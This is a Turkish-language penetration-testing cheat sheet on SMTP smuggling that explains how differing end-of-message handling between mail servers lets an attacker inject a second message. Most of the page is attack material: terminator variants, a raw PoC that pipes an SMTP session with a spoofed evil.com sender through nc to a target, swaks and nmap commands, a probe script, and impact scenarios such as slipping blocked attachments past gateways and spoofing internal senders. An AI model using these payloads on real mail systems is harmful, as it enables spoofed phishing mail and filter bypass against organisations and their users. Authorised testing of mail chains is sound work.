SMTP Smuggling
network smtp
SMTP smuggling, gönderen ve alan MTA’nın mesaj sonu / satır sonu yorumunu farklılaştırmasından doğar. Amaç: güvenlik filtrelerini atlatıp sahte veya ikinci bir mesaj enjekte etmek.
Metodoloji
Section titled “Metodoloji”-
Zincirdeki MTA’ları ve proxy/filter’ı belirle.
-
<CR><LF>.<CR><LF>ve alternatif terminator varyantlarını test et. -
Enjekte mesajın ikinci alıcıya düşüp düşmediğini doğrula.
-
Spoof + filter bypass etkisini kanıtla.
Klasik terminator
Section titled “Klasik terminator”DATAFrom: attacker@evil.comTo: victim@corp.localSubject: one
hello.Smuggle varyantları
Section titled “Smuggle varyantları”\r\n.\r\n\n.\n\r\n.\n\n.\r\n\r\n.\r\nMAIL FROM:<second@evil.com>\r\n...PoC iskeleti (swaks / raw)
Section titled “PoC iskeleti (swaks / raw)”printf 'EHLO a\r\nMAIL FROM:<a@evil.com>\r\nRCPT TO:<victim@corp.local>\r\nDATA\r\nSubject: x\r\n\r\nbody\r\n.\r\nQUIT\r\n' | nc TARGET 25# İkinci mesajı DATA gövdesine gömülü terminator ile deneOuter message → filter görürInner message → outbound MTA ayrı mail olarak iletirEtki senaryoları
Section titled “Etki senaryoları”- SPF/DKIM bypass görünümü (yanlış hizalı zincir)- Güvenlik gateway'inin engellediği eki iç mesajda geçirmek- İç kullanıcıya spoof From ile ikinci mailAraçlar
Section titled “Araçlar”nmap -p25,465,587 -sV TARGETswaks --server TARGET --to victim@corp.local --from a@evil.com --data smuggle.emlpython3 smtp_smuggle_probe.py --target TARGET --rcpt victim@corp.localChecklist
Section titled “Checklist”[ ] MTA zinciri haritalandı[ ] Terminator varyantları gönderildi[ ] İkinci/mesaj-içi teslimat kanıtlandı[ ] Spoof veya filter bypass etkisi belgelendi